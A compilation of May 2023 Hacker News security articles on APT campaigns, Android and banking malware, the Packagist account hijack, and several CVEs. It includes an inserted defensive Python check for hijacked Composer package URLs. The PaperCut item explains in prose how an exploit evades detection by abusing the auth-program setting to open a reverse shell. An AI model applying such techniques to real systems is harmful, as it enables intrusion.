Dragon Breath APT Group Using Double-Clean-App Technique to Target Gambling Industry
7.5.23  APT  The Hacker News
An advanced persistent threat (APT) actor known as Dragon Breath has been observed adding new layers of complexity to its attacks by adopting a novel DLL side-loading mechanism.

"The attack is based on a classic side-loading attack, consisting of a clean application, a malicious loader, and an encrypted payload, with various modifications made to these components over time," Sophos researcher Gabor Szappanos said.

"The latest campaigns add a twist in which a first-stage clean application 'side'-loads a second clean application and auto-executes it. The second clean application side-loads the malicious loader DLL. After that, the malicious loader DLL executes the final payload."

Operation Dragon Breath, also tracked under the names APT-Q-27 and Golden Eye, was first documented by QiAnXin in 2020, detailing a watering hole campaign designed to trick users into downloading a trojanized Windows installer for Telegram.

A subsequent campaign detailed by the Chinese cybersecurity company in May 2022 highlighted the continued use of Telegram installers as a lure to deploy additional payloads such as gh0st RAT.

Dragon Breath is also said to be part of a larger entity called Miuuti Group, with the adversary characterized as a "Chinese-speaking" entity targeting the online gaming and gambling industries, joining the likes of other Chinese activity clusters like Dragon Castling, Dragon Dance, and Earth Berberoka.

Double-Clean-App Technique
The double-dip DLL side-loading strategy, per Sophos, has been leveraged in attacks targeting users in the Philippines, Japan, Taiwan, Singapore, Hong Kong, and China. These attempted intrusions were ultimately unsuccessful.

The initial vector is a fake website hosting an installer for Telegram that, when opened, creates a desktop shortcut that's designed to load malicious components behind the scenes upon launch, while also displaying to the victim the Telegram app user interface.

What's more, the adversary is believed to have created multiple variations of the scheme in which tampered installers for other apps, such as LetsVPN and WhatsApp, are used to initiate the attack chain.

The next stage involves the use of a second clean application as an intermediate to avoid detection and load the final payload via a malicious DLL.

The payload functions as a backdoor capable of downloading and executing files, clearing event logs, extracting and setting clipboard content, running arbitrary commands, and stealing cryptocurrency from the MetaMask wallet extension for Google Chrome.

"DLL sideloading, first identified in Windows products in 2010 but prevalent across multiple platforms, continues to be an effective and appealing tactic for threat actors," Szappanos said.

"This double-clean-app technique employed by the Dragon Breath group, targeting a user sector (online gambling) that has traditionally been less scrutinized by security researchers, represents the continued vitality of this approach."


New Vulnerability in Popular WordPress Plugin Exposes Over 2 Million Sites to Cyberattacks
6.5.23  Vulnerability  The Hacker News
Users of the Advanced Custom Fields plugin for WordPress are being urged to update to version 6.1.6 following the discovery of a security flaw.

The issue, assigned the identifier CVE-2023-30777, relates to a case of reflected cross-site scripting (XSS) that could be abused to inject arbitrary executable scripts into otherwise benign websites.

The plugin, which is available both as a free and pro version, has over two million active installations. The issue was discovered and reported to the maintainers on May 2, 2023.

"This vulnerability allows any unauthenticated user from stealing sensitive information to, in this case, privilege escalation on the WordPress site by tricking a privileged user to visit the crafted URL path," Patchstack researcher Rafie Muhammad said.

Reflected XSS attacks usually occur when victims are tricked into clicking on a bogus link sent via email or another route, causing the malicious code to be sent to the vulnerable website, which reflects the attack back to the user's browser.

This element of social engineering means that reflected XSS does not have the same reach and scale as stored XSS attacks, prompting threat actors to distribute the malicious link to as many victims as possible.

"[A reflected XSS attack] is typically a result of incoming requests not being sufficiently sanitized, which allows for the manipulation of a web application's functions and the activation of malicious scripts," Imperva notes.

WordPress Plugin
It's worth noting that CVE-2023-30777 can be activated on a default installation or configuration of Advanced Custom Fields, although it's only possible to do so from logged-in users who have access to the plugin.

The development comes as Craft CMS patched two medium-severity XSS flaws (CVE-2023-30177 and CVE-2023-31144) that could be exploited by a threat actor to serve malicious payloads.

It also follows the disclosure of another XSS flaw in the cPanel product (CVE-2023-29489, CVSS score: 6.1) that could be exploited without any authentication to run arbitrary JavaScript.

"An attacker can not only attack the management ports of cPanel but also the applications that are running on port 80 and 443," Assetnote's Shubham Shah said, adding it could enable an adversary to hijack a valid user's cPanel session.

"Once acting on behalf of an authenticated user of cPanel, it is usually trivial to upload a web shell and gain command execution."


New Android Malware 'FluHorse' Targeting East Asian Markets with Deceptive Tactics
6.5.23  Android  The Hacker News
Various sectors in East Asian markets have been subjected to a new email phishing campaign that distributes a previously undocumented strain of Android malware called FluHorse that abuses the Flutter software development framework.

"The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs," Check Point said in a technical report. "These malicious apps steal the victims' credentials and two-factor authentication (2FA) codes."

The malicious apps have been found to imitate popular apps like ETC and VPBank Neo, which are widely used in Taiwan and Vietnam. Evidence gathered so far shows that the activity has been active since at least May 2022.

The phishing scheme in itself is fairly straightforward, wherein victims are lured with emails that contain links to a bogus website that hosts malicious APK files. Also added to the website are checks that aim to screen victims and deliver the app only if their browser User-Agent string matches that of Android.

Once installed, the malware requests SMS permissions and prompts the user to input their credentials and credit card information, all of which is subsequently exfiltrated to a remote server in the background while the victim is asked to wait for several minutes.

Android Malware
The threat actors also abuse their access to SMS messages to intercept all incoming 2FA codes and redirect them to the command-and-control server.

The Israeli cybersecurity firm said it further identified a dating app that redirected Chinese-speaking users to rogue landing pages that are designed to capture credit card information.

Several high-profile organizations are said to be among the recipients of these phishing emails, including employees of the government sector and large industrial companies, with new infrastructure and fraudulent applications showing up every month.

Interestingly, the malicious functionality is implemented with Flutter, an open source UI software development kit that can be used to develop cross-platform apps from a single codebase.

While threat actors are known to use a variety of tricks like evasion techniques, obfuscation, and long delays before execution to resist analysis and get around virtual environments, the use of Flutter marks a new level of sophistication.

"The malware developers did not put much effort into the programming, instead relying on Flutter as a developing platform," the researchers concluded.

"This approach allowed them to create dangerous and mostly undetected malicious applications. One of the benefits of using Flutter is that its hard-to-analyze nature renders many contemporary security solutions worthless."


Hackers Targeting Italian Corporate Banking Clients with New Web-Inject Toolkit DrIBAN
5.5.23  Virus  The Hacker News
Corporate Banking
Italian corporate banking clients are the target of an ongoing financial fraud campaign that has been leveraging a new web-inject toolkit called drIBAN since at least 2019.

"The main goal of drIBAN fraud operations is to infect Windows workstations inside corporate environments trying to alter legitimate banking transfers performed by the victims by changing the beneficiary and transferring money to an illegitimate bank account," Cleafy researchers Federico Valentini and Alessandro Strino said.

The bank accounts, per the Italian cybersecurity firm, are either controlled by the threat actors themselves or their affiliates, who are then tasked with laundering the stolen funds.

The use of web injects is a time-tested tactic that makes it possible for malware to inject custom scripts on the client side by means of a man-in-the-browser (MitB) attack and intercept traffic to and from the server.

The fraudulent transactions are often realized by means of a technique called Automated Transfer System (ATS) that's capable of bypassing anti-fraud systems put in place by banks and initiating unauthorized wire transfers from a victim's own computer.

Over the years, the operators behind drIBAN have gotten more savvy at avoiding detection and developing effective social engineering strategies, in addition to establishing a foothold for long periods in corporate bank networks.

Cleafy said 2021 was the year when the classic "banking trojan" operation evolved into an advanced persistent threat. Furthermore, there are indications that the activity cluster overlaps with a 2018 campaign mounted by an actor tracked by Proofpoint as TA554 targeting users in Canada, Italy, and the U.K.

Corporate Banking
The attack chain begins with a certified email (or PEC email) in an attempt to lull victims into a false sense of security. These phishing emails come bearing an executable file that acts as a downloader for a malware called sLoad (aka Starslord loader).

A PowerShell loader, sLoad is a reconnaissance tool that collects and exfiltrates information from the compromised host, with the purpose of assessing the target and dropping a more significant payload like Ramnit if the target is deemed profitable.

"This 'enrichment phase' could continue for days or weeks, depending on the number of infected machines," Cleafy noted. "Additional data will be exfiltrated to make the resulting botnet more and more solid and consistent."

sLoad also leverages living-off-the-land (LotL) techniques by abusing legitimate Windows tools like PowerShell and BITSAdmin as part of its evasion mechanisms.

Another characteristic of the malware is its ability to check against a predefined list of corporate banking institutions to determine if the hacked workstation is one among the targets, and if so, proceed with the infection.

"All the bots that successfully pass those steps will be selected by botnet operators and considered as 'new candidates' for banking fraud operations moving forward to the next stage, where Ramnit, one of the most advanced banking trojans, will be installed," the researchers said.


N. Korean Kimsuky Hackers Using New Recon Tool ReconShark in Latest Cyberattacks
5.5.23  BigBrothers  The Hacker News
N. Korean Kimsuky Hackers
The North Korean state-sponsored threat actor known as Kimsuky has been discovered using a new reconnaissance tool called ReconShark as part of an ongoing global campaign.

"[ReconShark] is actively delivered to specifically targeted individuals through spear-phishing emails, OneDrive links leading to document downloads, and the execution of malicious macros," SentinelOne researchers Tom Hegel and Aleksandar Milenkoski said.

Kimsuky is also known by the names APT43, ARCHIPELAGO, Black Banshee, Nickel Kimball, Emerald Sleet (previously Thallium), and Velvet Chollima.

Active since at least 2012, the prolific threat actor has been linked to targeted attacks on non-governmental organizations (NGOs), think tanks, diplomatic agencies, military organizations, economic groups, and research entities across North America, Asia, and Europe.

The latest intrusion set documented by SentinelOne leverages geopolitical themes related to North Korea's nuclear proliferation to activate the infection sequence.

"Notably, the spear-phishing emails are made with a level of design quality tuned for specific individuals, increasing the likelihood of opening by the target," the researchers said. "This includes proper formatting, grammar, and visual clues, appearing legitimate to unsuspecting users."

ReconShark
These messages contain links to booby-trapped Microsoft Word documents hosted on OneDrive to deploy ReconShark, which chiefly functions as a recon tool to execute instructions sent from an actor-controlled server. It's also an evolution of the threat actor's BabyShark malware toolset.

"It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator," Palo Alto Networks Unit 42 said in its analysis of BabyShark in February 2019.

ReconShark is specifically designed to exfiltrate details about running processes, deployed detection mechanisms and hardware information, suggesting that data gathered from the tool is used to carry out "precision attacks" involving malware tailored to the targeted environment in a manner that sidesteps detection.

The malware is also capable of deploying additional payloads from the server based on "what detection mechanism processes run on infected machines."

The findings add to growing evidence that the threat actor is actively shifting its tactics to get a foothold on compromised hosts, establish persistence, and stealthily gather intelligence for extended periods of time.

"The ongoing attacks from Kimsuky and their use of the new reconnaissance tool, ReconShark, highlight the evolving nature of the North Korean threat landscape," SentinelOne said.


Packagist Repository Hacked: Over a Dozen PHP Packages with 500 Million Installs Compromised
5.5.23  Hacking  The Hacker News
Packagist
PHP software package repository Packagist revealed that an "attacker" gained access to four inactive accounts on the platform to hijack over a dozen packages with over 500 million installs to date.

"The attacker forked each of the packages and replaced the package description in composer.json with their own message but did not otherwise make any malicious changes," Packagist's Nils Adermann said. "The package URLs were then changed to point to the forked repositories."

The four user accounts are said to have had access to a total of 14 packages, including multiple Doctrine packages. The incident took place on May 1, 2023. The complete list of impacted packages is as follows -

acmephp/acmephp
acmephp/core
acmephp/ssl
doctrine/doctrine-cache-bundle
doctrine/doctrine-module
doctrine/doctrine-mongo-odm-module
doctrine/doctrine-orm-module
doctrine/instantiator
growthbook/growthbook
jdorn/file-system-cache
jdorn/sql-formatter
khanamiryan/qrcode-detector-decoder
object-calisthenics/phpcs-calisthenics-rules
tga/simhash-php

Security researcher Ax Sharma, writing for Bleeping Computer, revealed that the changes were made by an anonymous penetration tester with the pseudonym "neskafe3v1" in an attempt to land a job.

The attack chain, in a nutshell, made it possible to modify the Packagist page for each of these packages to a namesake GitHub repository, effectively altering the installation workflow used within Composer environments.

Successful exploitation meant that developers downloading the packages would get the forked version as opposed to the actual contents.

Packagist said that no additional malicious changes were distributed, and that all the accounts were disabled and their packages restored on May 2, 2023. It's also urging users to enable two-factor authentication (2FA) to secure their accounts.

"All four accounts appear to have been using shared passwords leaked in previous incidents on other platforms," Adermann noted. "Please, do not reuse passwords."
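A defender-side check for the URL swap described above, added here as an example and not Packagist's or Composer's own tooling: it scans a composer.lock for packages whose GitHub source or dist URL is owned by an account outside an allowlist for that vendor. The allowlist, the sample lock entries and the fork account name are constructed.

```python
import json
import re
from urllib.parse import urlparse

# Constructed allowlist: Packagist vendor -> GitHub accounts allowed to host its code.
# A vendor absent from the map is expected to match its own name.
EXPECTED_OWNERS = {
    "doctrine": {"doctrine"},
    "acmephp": {"acmephp"},
    "jdorn": {"jdorn"},
}

# Constructed composer.lock excerpt: the first entry mimics a hijacked package whose
# URLs were pointed at a namesake fork under a different (placeholder) account.
SAMPLE_LOCK = json.dumps({
    "packages": [
        {
            "name": "doctrine/instantiator",
            "version": "1.5.0",
            "source": {"type": "git",
                       "url": "https://github.com/fork-account-placeholder/instantiator.git"},
            "dist": {"type": "zip",
                     "url": "https://api.github.com/repos/fork-account-placeholder/instantiator/zipball/abc123"},
        },
        {
            "name": "jdorn/sql-formatter",
            "version": "1.2.17",
            "source": {"type": "git", "url": "https://github.com/jdorn/sql-formatter.git"},
            "dist": {"type": "zip",
                     "url": "https://api.github.com/repos/jdorn/sql-formatter/zipball/def456"},
        },
    ],
    "packages-dev": [],
})

# github.com/<owner>/<repo>(.git) and api.github.com/repos/<owner>/<repo>/...
REPO_RE = re.compile(r"^/(?P<owner>[^/]+)/(?P<repo>[^/]+?)(?:\.git)?/?$")
API_RE = re.compile(r"^/repos/(?P<owner>[^/]+)/(?P<repo>[^/]+)/")


def github_owner_repo(url):
    """Return (owner, repo) for a github.com or api.github.com URL, else None."""
    parsed = urlparse(url)
    host = parsed.netloc.lower()
    if host == "github.com":
        match = REPO_RE.match(parsed.path)
    elif host == "api.github.com":
        match = API_RE.match(parsed.path)
    else:
        return None
    return (match.group("owner"), match.group("repo")) if match else None


def check_lock(lock_text):
    """Return findings as (package, url_kind, url, reason) for URLs whose GitHub
    owner is not allowed for the package's Packagist vendor."""
    findings = []
    lock = json.loads(lock_text)
    for pkg in lock.get("packages", []) + lock.get("packages-dev", []):
        name = pkg["name"]
        vendor = name.split("/", 1)[0]
        allowed = {o.lower() for o in EXPECTED_OWNERS.get(vendor, {vendor})}
        for kind in ("source", "dist"):
            url = (pkg.get(kind) or {}).get("url")
            if not url:
                continue
            owner_repo = github_owner_repo(url)
            if owner_repo is None:
                # Non-GitHub hosts are outside this check; surface them for manual review.
                findings.append((name, kind, url, "host not verified by this check"))
                continue
            owner, _repo = owner_repo
            if owner.lower() not in allowed:
                findings.append((name, kind, url,
                                 f"owner {owner!r} not allowed for vendor {vendor!r}"))
    return findings


if __name__ == "__main__":
    for finding in check_lock(SAMPLE_LOCK):
        print(*finding, sep="  ")
```

Run against a real lock file, the check only catches swaps to a different GitHub account; a fork pushed under the legitimate account still needs the account's own 2FA and credential hygiene.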

The development comes as cloud security firm Aqua identified thousands of exposed cloud software registries and repositories containing more than 250 million artifacts and over 65,000 container images.

The misconfigurations stem from mistakenly connecting registries to the internet, allowing anonymous access by design, using default passwords, and granting upload privileges to users that could be abused to poison the registry with malicious code.

"In some of these cases, anonymous user access allowed a potential attacker to gain sensitive information, such as secrets, keys, and passwords, which could lead to a severe software supply chain attack and poisoning of the software development life cycle (SDLC)," researchers Mor Weinberger and Assaf Morag disclosed late last month.


Fleckpe Android Malware Sneaks onto Google Play Store with Over 620,000 Downloads
5.5.23  Android  The Hacker News
A new Android subscription malware named Fleckpe has been unearthed on the Google Play Store, amassing more than 620,000 downloads in total since 2022.

Kaspersky, which identified 11 apps on the official app storefront, said the malware masqueraded as legitimate photo editing, camera, and smartphone wallpaper apps. The apps have since been taken down.

The operation primarily targets users from Thailand, although telemetry data gathered by the Russian cybersecurity firm has revealed victims in Poland, Malaysia, Indonesia, and Singapore.

The apps further offer the promised functionality to avoid raising red flags, but conceal their real purpose under the hood. The list of the offending apps is as follows -

Beauty Camera Plus (com.beauty.camera.plus.photoeditor)
Beauty Photo Camera (com.apps.camera.photos)
Beauty Slimming Photo Editor (com.beauty.slimming.pro)
Fingertip Graffiti (com.draw.graffiti)
GIF Camera Editor (com.gif.camera.editor)
HD 4K Wallpaper (com.hd.h4ks.wallpaper)
Impressionism Pro Camera (com.impressionism.prozs.app)
Microclip Video Editor (com.microclip.vodeoeditor)
Night Mode Camera Pro (com.urox.opixe.nightcamreapro)
Photo Camera Editor (com.toolbox.photoeditor)
Photo Effect Editor (com.picture.pictureframe)

"When the app starts, it loads a heavily obfuscated native library containing a malicious dropper that decrypts and runs a payload from the app assets," Kaspersky researcher Dmitry Kalinin said.

The payload, for its part, is designed to contact a remote server and transmit information about the compromised device (e.g., Mobile Country Code and Mobile Network Code), following which the server responds back with a paid subscription page.

The malware subsequently opens the page in an invisible web browser window and attempts to subscribe on the user's behalf by abusing its permissions to access notifications and obtain the confirmation code required to complete the step.

In a sign that Fleckpe is being actively developed, recent versions of the malware have moved most of the malicious functionality to the native library in a bid to evade detection by security tools.

"The payload now only intercepts notifications and views web pages, acting as a bridge between the native code and the Android components required for purchasing a subscription," Kalinin noted.

"Unlike the native library, the payload has next to no evasion capabilities, although the malicious actors did add some code obfuscation to the latest version."

This is not the first time subscription malware has been found on the Google Play Store. Fleckpe joins other fleeceware families like Joker (aka Bread or Jocker) and Harly, which subscribe infected devices to unwanted premium services and conduct billing fraud.

While such apps are not as dangerous as spyware or financial trojans, they can still incur unauthorized charges and be repurposed by their operators to harvest a wide range of sensitive information and serve as entry points for more nefarious malware.

If anything, the findings are yet another indication that threat actors are continuing to discover new ways to sneak their apps onto official app marketplaces to scale their campaigns, requiring that users exercise caution when downloading apps and granting permissions to them.

"Growing complexity of the trojans has allowed them to successfully bypass many anti-malware checks implemented by the marketplaces, remaining undetected for long periods of time," Kalinin said.


Cisco Warns of Vulnerability in Popular Phone Adapter, Urges Migration to Newer Model
5.5.23  Vulnerability  The Hacker News
Cisco has warned of a critical security flaw in SPA112 2-Port Phone Adapters that it said could be exploited by a remote attacker to execute arbitrary code on affected devices.

The issue, tracked as CVE-2023-20126, is rated 9.8 out of a maximum of 10 on the CVSS scoring system. The company credited Catalpa of DBappSecurity for reporting the shortcoming.

The product in question makes it possible to connect analog phones and fax machines to a VoIP service provider without requiring an upgrade.

"This vulnerability is due to a missing authentication process within the firmware upgrade function," the company said in a bulletin.

"An attacker could exploit this vulnerability by upgrading an affected device to a crafted version of firmware. A successful exploit could allow the attacker to execute arbitrary code on the affected device with full privileges."

Despite the severity of the flaw, the networking equipment maker said it does not intend to release fixes due to the fact the devices have reached end-of-life (EoL) status as of June 1, 2020.

It instead is recommending that users migrate to a Cisco ATA 190 Series Analog Telephone Adapter, which is set to receive its last update on March 31, 2024. There is no evidence that the flaw has been maliciously exploited in the wild.


Researchers Discover 3 Vulnerabilities in Microsoft Azure API Management Service
5.5.23  Vulnerability  The Hacker News
Three new security flaws have been disclosed in Microsoft Azure API Management service that could be abused by malicious actors to gain access to sensitive information or backend services.

This includes two server-side request forgery (SSRF) flaws and one instance of unrestricted file upload functionality in the API Management developer portal, according to Israeli cloud security firm Ermetic.

"By abusing the SSRF vulnerabilities, attackers could send requests from the service's CORS Proxy and the hosting proxy itself, access internal Azure assets, deny service and bypass web application firewalls," security researcher Liv Matan said in a report shared with The Hacker News.

"With the file upload path traversal, attackers could upload malicious files to Azure's hosted internal workload."

Azure API Management is a multicloud management platform that allows organizations to securely expose their APIs to external and internal customers and enable a wide range of connected experiences.

Of the two SSRF flaws identified by Ermetic, one of them is a bypass for a fix put in place by Microsoft to address a similar vulnerability reported by Orca earlier this year. The other vulnerability resides in the API Management proxy function.

Exploitation of SSRF flaws can result in loss of confidentiality and integrity, permitting a threat actor to read internal Azure resources and execute unauthorized code.

The path traversal flaw discovered in the developer portal, on the other hand, stems from a lack of validation of the file type and path of the files uploaded.

An authenticated user can leverage this loophole to upload malicious files to the developer portal server and potentially even execute arbitrary code on the underlying system.

Following responsible disclosure, all three flaws have been patched by Microsoft.

The findings come weeks after researchers from Orca detailed a "by-design flaw" in Microsoft Azure that could be exploited by attackers to gain access to storage accounts, move laterally in the environment, and even execute remote code.

It also follows the discovery of another Azure vulnerability dubbed EmojiDeploy that could enable an attacker to seize control of a targeted application.


Researchers Uncover New Exploit for PaperCut Vulnerability That Can Bypass Detection
5.5.23  Exploit  The Hacker News
Cybersecurity researchers have found a way to exploit a recently disclosed critical flaw in PaperCut servers in a manner that bypasses all current detections.

Tracked as CVE-2023-27350 (CVSS score: 9.8), the issue affects PaperCut MF and NG installations that could be exploited by an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.

While the flaw was patched by the Australian company on March 8, 2023, the first signs of active exploitation emerged on April 13, 2023.

Since then, the vulnerability has been weaponized by multiple threat groups, including ransomware actors, with post-exploitation activity resulting in the execution of PowerShell commands designed to drop additional payloads.

Now, VulnCheck has published a proof-of-concept (PoC) exploit that sidesteps existing detection signatures by leveraging the fact that "PaperCut NG and MF offer multiple paths to code execution."

It's worth noting that public exploits for the flaw use the PaperCut printer scripting interface to either execute Windows commands or drop a malicious Java archive (JAR) file.

Both these approaches, per VulnCheck, leave distinct footprints in the Windows System Monitor (aka Sysmon) service and the server's log file, not to mention trigger network signatures that can detect the authentication bypass.

But the Massachusetts-based threat intelligence firm said it discovered a new method that abuses the print management software's "User/Group Sync" feature, which makes it possible to synchronize user and group information from Active Directory, LDAP, or a custom source.

When opting for a custom directory source, users can also specify a custom authentication program to validate a user's username and password. Interestingly, the user and auth programs can be any executable, although the auth program has to be interactive in nature.

The PoC exploit devised by VulnCheck banks on the auth program set as "/usr/sbin/python3" for Linux and "C:\Windows\System32\ftp.exe" for Windows. All an attacker then needs to execute arbitrary code is to provide a malicious username and password during a login attempt, the company said.

The attack method could be exploited to launch a Python reverse shell on Linux or download a custom reverse shell hosted on a remote server in Windows without activating any of the known detections.

"An administrative user attacking PaperCut NG and MF can follow multiple paths to arbitrary code execution," VulnCheck security researcher Jacob Baines pointed out.

"Detections that focus on one particular code execution method, or that focus on a small subset of techniques used by one threat actor are doomed to be useless in the next round of attacks. Attackers learn from defenders' public detections, so it's the defenders' responsibility to produce robust detections that aren't easily bypassed."


Meta Uncovers Massive Social Media Cyber Espionage Operations Across South Asia
4.5.23  Social  The Hacker News
Three different threat actors leveraged hundreds of elaborate fictitious personas on Facebook and Instagram to target individuals located in South Asia as part of disparate attacks.

"Each of these APTs relied heavily on social engineering to trick people into clicking on malicious links, downloading malware or sharing personal information across the internet," Guy Rosen, chief information security officer at Meta, said. "This investment in social engineering meant that these threat actors did not have to invest as much on the malware side."

The fake accounts, in addition to using traditional lures like women looking for a romantic connection, masqueraded as recruiters, journalists, or military personnel.

At least two of the cyber espionage efforts entailed the use of low-sophistication malware with reduced capabilities, likely in an attempt to get past app verification checks established by Apple and Google.

One of the groups that came under Meta's radar is a Pakistan-based advanced persistent threat (APT) group that relied on a network of 120 accounts on Facebook and Instagram and rogue apps and websites to infect military personnel in India and in the Pakistan Air Force with GravityRAT under the guise of cloud storage and entertainment apps.

The tech giant also expunged about 110 accounts on Facebook and Instagram linked to an APT identified as Bahamut that targeted activists, government employees, and military staff in India and Pakistan with Android malware published in the Google Play Store. The apps, which posed as secure chat or VPN apps, have since been removed.

Lastly, it purged 50 accounts on Facebook and Instagram tied to an India-based threat actor dubbed Patchwork, which took advantage of malicious apps uploaded to the Play Store to harvest data from victims in Pakistan, India, Bangladesh, Sri Lanka, Tibet, and China.

Also disrupted by Meta are six adversarial networks from the U.S., Venezuela, Iran, China, Georgia, Burkina Faso, and Togo that engaged in what it called "coordinated inauthentic behavior" on Facebook and other social media platforms like Twitter, Telegram, YouTube, Medium, TikTok, Blogspot, Reddit, and WordPress.

All these geographically dispersed networks are said to have set up fraudulent news media brands, hacktivist groups, and NGOs to build credibility, with three of them linked to a U.S.-based marketing firm named Predictvia, a political marketing consultancy in Togo known as the Groupe Panafricain pour le Commerce et l'Investissement (GPCI), and Georgia's Strategic Communications Department.

Two networks that originated from China operated dozens of fraudulent accounts, pages, and groups across Facebook and Instagram to target users in India, Tibet, Taiwan, Japan, and the Uyghur community.

In both instances, Meta said it took down the activities before they could "build an audience" on its services, adding it found associations connecting one network to individuals associated with a Chinese IT firm referred to as Xi'an Tianwendian Network Technology.

The network from Iran, per the social media giant, primarily singled out Israel, Bahrain, and France, corroborating an earlier assessment from Microsoft about Iran's involvement in the hacking of the French satirical magazine Charlie Hebdo in January 2023.

"The people behind this network used fake accounts to post, like and share their own content to make it appear more popular than it was, as well as to manage Pages and Groups posing as hacktivist teams," Meta said. "They also liked and shared other people's posts about cyber security topics, likely to make fake accounts look more credible."

The disclosure also coincides with a new report from Microsoft, which revealed that Iranian state-aligned actors are increasingly relying on cyber-enabled influence operations to "boost, exaggerate, or compensate for shortcomings in their network access or cyberattack capabilities" since June 2022.

The Iranian government has been linked by Redmond to 24 such operations in 2022, up from seven in 2021, including clusters tracked as Moses Staff, Homeland Justice, Abraham's Ax, Holy Souls, and DarkBit. Seventeen of the operations have taken place since June 2022.

The Windows maker further said it observed "multiple Iranian actors attempting to use bulk SMS messaging in three cases in the second half of 2022, likely to enhance the amplification and psychological effects of their cyber-influence operations."

The shift in tactics is also characterized by the rapid exploitation of known security flaws, use of victim websites for command-and-control, and adoption of bespoke implants to avoid detection and steal information from victims.

The operations, which have singled out Israel and the U.S. as a retaliation for allegedly fomenting unrest in the nation, have sought to bolster Palestinian resistance, instigate unrest in Bahrain, and counter the normalization of Arab-Israeli relations.


Meta Takes Down Malware Campaign That Used ChatGPT as a Lure to Steal Accounts
4.5.23  Virus  The Hacker News

Meta said it took steps to block more than 1,000 malicious URLs from being shared across its services that were found to leverage OpenAI's ChatGPT as a lure to propagate about 10 malware families since March 2023.

The development comes against the backdrop of fake ChatGPT web browser extensions being increasingly used to steal users' Facebook account credentials with an aim to run unauthorized ads from hijacked business accounts.

"Threat actors create malicious browser extensions available in official web stores that claim to offer ChatGPT-based tools," Meta said. "They would then promote these malicious extensions on social media and through sponsored search results to trick people into downloading malware."

The social media giant said it has blocked several iterations of a multi-pronged malware campaign dubbed Ducktail over the years, adding it issued a cease and desist letter to individuals behind the operation who are located in Vietnam.

Trend Micro, in a series of tweets last week, detailed an information stealer that's disguised as a Windows desktop client for ChatGPT to extract passwords, session cookies, and history from Chromium-powered browsers. The company said the malware shares similarities with Ducktail.

Besides ChatGPT, threat actors have also been observed shifting to other "hot-button issues and popular topics" like Google Bard, TikTok marketing tools, pirated software and movies, and Windows utilities to dupe people into clicking on bogus links.

"These changes are likely an attempt by threat actors to ensure that any one service has only limited visibility into the entire operation," Guy Rosen, chief information security officer at Meta, said.

The attack chains are primarily engineered to target the personal accounts of users who manage or are connected to business pages and advertising accounts on Facebook.

Besides using social media for propagating the ChatGPT-themed malicious URLs, the malware is hosted on a variety of legitimate services such as Buy Me a Coffee, Discord, Dropbox, Google Drive, iCloud, MediaFire, Mega, Microsoft OneDrive, and Trello.

Ducktail isn't the only stealer malware detected in the wild, as Meta disclosed that it uncovered another novel strain dubbed NodeStealer that's capable of plundering cookies and passwords from web browsers to ultimately compromise Facebook, Gmail, and Outlook accounts.

The malware is assessed to be of Vietnamese origin, with Meta noting that it "took action to disrupt it and help people who may have been targeted to recover their accounts" within two weeks of it being deployed in late January 2023.

Samples analyzed by the Menlo Park-based company show that the NodeStealer binary is distributed via Windows executables disguised as PDF and XLSX files with filenames relating to marketing and monthly budgets. The files, when opened, deliver JavaScript code that's designed to exfiltrate sensitive data from Chromium-based browsers.

NodeStealer gets its name from the use of the Node.js cross-platform JavaScript runtime environment, which is bundled along with the main payload, to set up persistence and execute the malware. No new artifacts have been identified as of February 27, 2023.

"After retrieving the Facebook credentials from the target's browser data, the malware uses it to make several unauthorized requests to Facebook URLs to enumerate account information related to advertising," Meta said. "The stolen information then enables the threat actor to assess and then use users' advertising accounts to run unauthorized ads."

In an attempt to slip under the radar of the company's anti-abuse systems, the rogue requests are made from the targeted user's device to the Facebook APIs, lending a veneer of legitimacy to the activity.

To counter such threats, Meta said it's launching a new support tool that guides users to identify and remove malware, enable businesses to verify connected Business Manager accounts, and require additional authentication when accessing a credit line or changing business administrators.


Google Introduces Passwordless Secure Sign-In with Passkeys for Google Accounts
4.5.23  Security  The Hacker News
Almost five months after Google added support for passkeys to its Chrome browser, the tech giant has begun rolling out the passwordless solution across Google Accounts on all platforms.

Passkeys, backed by the FIDO Alliance, are a more secure way to sign in to apps and websites without having to use a traditional password. Instead, users sign in by simply unlocking their computer or mobile device with their biometrics (e.g., fingerprint or facial recognition) or a local PIN.

"And, unlike passwords, passkeys are resistant to online attacks like phishing, making them more secure than things like SMS one-time codes," Google noted.

Passkeys, once created, are locally stored on the device, and are not shared with any other party. This also obviates the need for setting up two-factor authentication, as it proves that "you have access to your device and are able to unlock it."

Users also have the choice of creating passkeys for every device they use to log in to their Google Account. That said, a passkey created on one device will be synced to all of the user's other devices running the same operating system platform (i.e., Android, iOS/macOS, or Windows), provided they are signed in to the same account. Viewed in that light, passkeys are not truly interoperable across platforms.

It's worth pointing out that both Google Password Manager and iCloud Keychain use end-to-end encryption to keep synced passkeys private, which prevents users from getting locked out should they lose access to one of their devices and makes it easier to upgrade from one device to another.

Additionally, users can sign in on a new device or temporarily use a different device by selecting the option to "use a passkey from another device," which then uses the phone's screen lock and proximity to approve a one-time sign-in.

"The device then verifies that your phone is in proximity using a small anonymous Bluetooth message and sets up an end-to-end encrypted connection to the phone through the internet," the company explained.

"The phone uses this connection to deliver your one-time passkey signature, which requires your approval and the biometric or screen lock step on the phone. Neither the passkey itself nor the screen lock information is sent to the new device."

While this may be the "beginning of the end of the password," the company said it intends to continue to support existing login methods like passwords and two-factor authentication for the foreseeable future.

Google is also recommending that users do not create passkeys on devices that are shared with others, since anyone who can unlock such a device could use the passkey, effectively undermining all of its security protections.


Chinese Hacker Group Earth Longzhi Resurfaces with Advanced Malware Tactics
4.5.23  Virus  The Hacker News
A Chinese state-sponsored hacking outfit has resurfaced with a new campaign targeting government, healthcare, technology, and manufacturing entities based in Taiwan, Thailand, the Philippines, and Fiji after more than six months of no activity.

Trend Micro attributed the intrusion set to a cyber espionage group it tracks under the name Earth Longzhi, which is a subgroup within APT41 (aka HOODOO or Winnti) and shares overlaps with various other clusters known as Earth Baku, SparklingGoblin, and GroupCC.

Earth Longzhi was first documented by the cybersecurity firm in November 2022, detailing its attacks against various organizations located in East and Southeast Asia as well as Ukraine.

Attack chains mounted by the threat actor leverage vulnerable public-facing applications as entry points to deploy the BEHINDER web shell, and then leverage that access to drop additional payloads, including a new variant of a Cobalt Strike loader called CroxLoader.

